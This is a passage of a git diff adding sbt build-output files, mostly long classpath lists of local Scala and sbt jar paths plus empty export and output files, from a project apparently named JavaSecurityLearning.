ar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/fullClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/fullClasspath/_global/streams/export
new file mode 100644
index 00000000..7078ef8f
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/fullClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/internalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/internalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..c9499290
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/internalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/internalDependencyClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/internalDependencyClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/managedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/managedClasspath/_global/streams/export
new file mode 100644
index 00000000..840acb78
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/managedClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedJars/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedJars/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/unmanagedJars/_global/streams/export
@@ -0,0 +1 @@
+
